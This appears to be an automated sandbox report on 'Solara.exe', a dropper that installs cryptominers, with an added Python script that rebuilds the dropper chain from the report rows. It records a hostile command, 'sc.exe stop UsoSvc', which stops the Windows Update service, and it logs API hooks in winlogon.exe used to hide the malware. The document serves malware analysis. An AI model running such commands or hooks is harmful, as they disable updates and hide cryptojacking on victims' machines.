Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
Source: C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\Solara.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Solara.exe | Static file information: File size 22179840 > 1048576
Source: Solara.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x14e4000
Source: SolaraBootstrapper.exe.10.dr | Static PE information: 0x9EA529E4 [Tue May 5 20:04:52 2054 UTC]
Source: eth.exe.0.dr | Static PE information: section name: .00cfg
Source: xmr.exe.0.dr | Static PE information: section name: .00cfg
Source: lrgkmixyjzta.exe.7.dr | Static PE information: section name: .00cfg
Source: Kawpow new.exe.13.dr | Static PE information: section name: .00cfg
Source: xmr new.exe.13.dr | Static PE information: section name: .00cfg
Source: eejhedztifcv.exe.22.dr | Static PE information: section name: .00cfg
(.00cfg is the section the MSVC linker emits for Control Flow Guard data, so by itself it is a weak indicator; its value here is that all six dropped files share it.)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04BF6338 pushad ; ret 1_2_04BF6341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04BF0CF0 push eax; ret 1_2_04BF0CFA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04BF0CE0 push eax; ret 1_2_04BF0CEA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04BF0CD0 push eax; ret 1_2_04BF0CDA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04BF6F1A pushad ; ret 1_2_04BF6F23
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_04EE6358 pushad ; ret 11_2_04EE6361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_04EE0CE0 push eax; ret 11_2_04EE0CEA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_04EE0CF0 push eax; ret 11_2_04EE0CFA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_04EE0CD0 push eax; ret 11_2_04EE0CDA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_04EE0C90 push eax; ret 11_2_04EE0CCA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_04EE6F10 pushad ; ret 11_2_04EE6F23
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_08F1841A pushad ; ret 11_2_08F1841B
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Code function: 15_2_02700677 push eax; ret 15_2_0270067A
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Code function: 15_2_02700669 push eax; ret 15_2_0270066A
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Code function: 15_2_027006F0 push eax; ret 15_2_027006FA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Code function: 15_2_027006E0 push eax; ret 15_2_027006EA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Code function: 15_2_027006D0 push eax; ret 15_2_027006DA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | Code function: 15_2_027006B0 push eax; ret 15_2_027006CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_049A42A8 push ebx; ret 17_2_049A42DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_049A638D pushad ; ret 17_2_049A6361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_049A0F90 push eax; ret 17_2_049A0F9A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_049A0F80 push eax; ret 17_2_049A0F8A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_049A0FA0 push eax; ret 17_2_049A0FAA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_049A6F1C pushad ; ret 17_2_049A6F23
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_049A0F64 push eax; ret 17_2_049A0F7A
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Code function: 19_2_0000027E8233ACDD push rcx; retf 003Fh 19_2_0000027E8233ACDE
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Code function: 19_2_0000027E8248C6DD push rcx; retf 003Fh 19_2_0000027E8248C6DE
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Code function: 22_2_0000012C42A4ACDD push rcx; retf 003Fh 22_2_0000012C42A4ACDE
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Code function: 22_2_0000012C42A9C6DD push rcx; retf 003Fh 22_2_0000012C42A9C6DE
Source: C:\Windows\System32\winlogon.exe | Code function: 66_2_000001E85899ACDD push rcx; retf 003Fh 66_2_000001E85899ACDE
Source: C:\Windows\System32\winlogon.exe | Code function: 66_2_000001E8589CC6DD push rcx; retf 003Fh 66_2_000001E8589CC6DE
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | File created: C:\Users\user\AppData\Local\Temp\xmr new.exe
Source: C:\Users\user\Desktop\Solara.exe | File created: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe
Source: C:\Users\user\Desktop\Solara.exe | File created: C:\Users\user\AppData\Local\Temp\eth.exe
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | File created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | File created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | File created: C:\Users\user\AppData\Local\Temp\kx new.exe
Source: C:\Users\user\AppData\Local\Temp\kx new.exe | File created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe
Source: C:\Users\user\AppData\Local\Temp\xmr.exe | File created: C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe
Source: C:\Users\user\Desktop\Solara.exe | File created: C:\Users\user\AppData\Local\Temp\xmr.exe
Source: C:\Users\user\AppData\Local\Temp\xmr.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
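The "File created" rows above are the dropper chain, and two of them (eejhedztifcv.exe and lrgkmixyjzta.exe) appear twice in the report. The following Python is an added example, not code from the report or from the sample: it parses rows in this format (DROP_ROWS is a constructed copy of the rows above, duplicates included on purpose), builds creator-to-created edges, finds the stage-0 binary as the only creator that nothing else dropped, and renders the lineage as an indented tree. It accepts both the separated form used here and the fused "…exeFile created: …Jump to dropped file" form of the raw export.

```python
"""Rebuild the dropper lineage from the 'File created' rows of a Joe Sandbox report.

Added example, not code from the report or the sample. DROP_ROWS is a constructed
copy of the rows listed above (duplicates included); nothing else is assumed."""
import re
from collections import defaultdict

DROP_ROWS = [
    r"Source: C:\Users\user\AppData\Local\Temp\kx new.exe | File created: C:\Users\user\AppData\Local\Temp\xmr new.exe",
    r"Source: C:\Users\user\Desktop\Solara.exe | File created: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe",
    r"Source: C:\Users\user\Desktop\Solara.exe | File created: C:\Users\user\AppData\Local\Temp\eth.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | File created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | File created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe | File created: C:\Users\user\AppData\Local\Temp\kx new.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\kx new.exe | File created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\xmr.exe | File created: C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe",
    r"Source: C:\Users\user\Desktop\Solara.exe | File created: C:\Users\user\AppData\Local\Temp\xmr.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | File created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\xmr.exe | File created: C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe",
]

# Creator path ends in .exe; the " | " separator is optional so the fused raw-export
# form ("...kx new.exeFile created: ...Jump to dropped file") parses as well.
ROW_RE = re.compile(
    r"^Source:\s*(?P<creator>.+?\.exe)\s*\|?\s*File created:\s*"
    r"(?P<created>.+?)\s*(?:Jump to dropped file)?$"
)


def parse_drop_rows(rows):
    """Return {creator: [created, ...]} in first-seen order; identical rows collapse."""
    edges = defaultdict(list)
    for row in rows:
        m = ROW_RE.match(row)
        if m is None:
            continue                      # not a File-created row; ignore it
        creator, created = m.group("creator"), m.group("created")
        if created not in edges[creator]:
            edges[creator].append(created)
    return dict(edges)


def roots(edges):
    """Creators that nothing in the listing dropped: the stage-0 binaries."""
    dropped = {c for children in edges.values() for c in children}
    return [p for p in edges if p not in dropped]


def lineage(edges, start):
    """Depth-first (depth, path) pairs below start. Each path is visited once, so a
    file the report records as dropped by two parents is not listed twice."""
    out, seen = [], set()

    def walk(path, depth):
        if path in seen:
            return
        seen.add(path)
        out.append((depth, path))
        for child in edges.get(path, []):
            walk(child, depth + 1)

    walk(start, 0)
    return out


def depth_map(edges):
    """{path: depth} over every root's lineage (stage-0 binary is depth 0)."""
    return {path: depth for root in roots(edges) for depth, path in lineage(edges, root)}


def render_tree(edges):
    return "\n".join("  " * d + p for r in roots(edges) for d, p in lineage(edges, r))


if __name__ == "__main__":
    print(render_tree(parse_drop_rows(DROP_ROWS)))
```

On the rows above this yields a single root, Solara.exe, with eejhedztifcv.exe four drops deep (Solara.exe, Solara Bootstrapper.exe, kx new.exe, xmr new.exe, then the ProgramData copy); the same walk over a full report also surfaces any binary that was dropped but never started, which is worth a look when the sandbox run ended early.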

Hooking and other Techniques for Hiding and Protection

Source: winlogon.exe | IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: winlogon.exe | IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: winlogon.exe | IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (repeated)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (repeated)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (repeated)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (repeated)
Source: winlogon.exe | User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Users\user\Desktop\Solara.exe | Process information set: NOOPENFILEERRORBOX (repeated)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (repeated)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (repeated)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
